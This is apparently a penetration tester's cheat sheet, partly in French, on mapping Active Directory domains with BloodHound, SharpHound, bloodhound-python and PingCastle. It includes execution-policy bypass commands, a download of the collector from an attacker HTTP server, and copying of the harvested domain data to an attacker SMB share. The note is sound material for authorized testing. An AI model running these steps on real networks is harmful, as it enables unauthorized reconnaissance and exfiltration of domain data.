Domain Mapping
BloodHound
# /!\ Information here might be outdated
# Future update incoming
Tips
# Right Click
# Get information about the node and also how to compromise the user / machine
# Owned
# Can be usefull during an internal pentest to note where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones
# Filters
# Can be usefull
# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developper Tools
# CTRL+R --> Reload display
# Still possible to edit data to set what you want
# If you don't have access to a domain machine but have creds
# You can run from host
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/ZIP.zip' -JsonFolder 'PATH/TO/folderas above' -CollectionMethod All -Domain FQDN
Setup
# Bloodhound directement depuis la machine cible
# apt-get install bloodhound
# Setup
$ sudo neo4j console
...
... http://localhost:7474
user/pass = neo4j/neo4j
# Start
$ bloodhound
URL : bolt://127.0.0.1:7687
Target Collection
# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download
https://github.com/BloodHoundAD/BloodHound
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
# Powershell
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All
# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs
# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe — CollectionMethod SessionLoop — MaxLoopTime 1h
C:\> SharpHound.exe — CollectionMethod ACL
.\SharpHound.exe --domain UCA.LAN --domaincontroller 192.168.30.10 --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly
# Python based ingestor (for remote work)
https://github.com/fox-it/BloodHound.py
# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All,LoggedOn
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri “http://10.10.16.112:8000/SharpHound.ps1” -OutFile “.\SharpHound.ps1”
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All
# Since Windows 10 you can't do anonymous smbserver anymore
sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"
net use Z: \\192.168.30.130\SDFR /user:peon peon
net use Z: /delete /y
copy C:\Users\xxx\Documents\20191104044628_BloodHound.zip \\10.10.16.112\TESTLOL\file.zip
Analysis
# Results will be zipped
# Get back zip, unzip it and upload files into bloodhound
# Custom queries
https://github.com/hausec/Bloodhound-Custom-Queries
# Replace or update the following file
C:\Users[USERNAME]\AppData\Roaming\BloodHound\customqueries.json
# Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.
https://github.com/seajaysec/cypheroth/
./cypheroth.sh -u neo4j -p BloodHound -d TESTLAB.LOCAL
./cypheroth.sh -u neo4j -p hunter2 -d BigTech.corp -a 10.0.0.1:7687 -t 5m -v true
# Some quickwin queries against a BloodHound database
https://github.com/kaluche/bloodhound-quickwin
# BloodHound tips for when the built-in queries are just not finding anything for you
https://twitter.com/n00py1/status/1508868743451090944?t=QfZV1rg7sjy6EG_pRAfiFg&s=19
# - Mark any user you compromise as "owned".
# - Mark high value targets
# - Find groups that have the "Admin Count" flag set but are not yet marked as high value
# - Find groups that do not have the "Admin Count" flag set, but have local admin on computers
# - Find all computers that can perform unconstrained delegation but are not DCs
# - Find any object that has inbound control over the domain. Mark them all as high value. Mark the domain as high value also.
# - Find groups that can reset passwords. Mark these groups as high value.
# - Then : MATCH p=shortestPath((g {owned:true})-[*1..]->(n {highvalue:true})) WHERE g<>n return p
PingCastle
Lien : https://www.pingcastle.com/PingCastleFiles/PingCastle_2.4.3.0.zip
> Drop exe on the target
> Run Pingcastle.exe (mode interactif par défaut)
> Healthcare (enter) et domaine (*)
> Mode CLI :
> PingCastle --healthcheck --server mydomain.com
> PingCastle --carto
ADACLScanner
TODO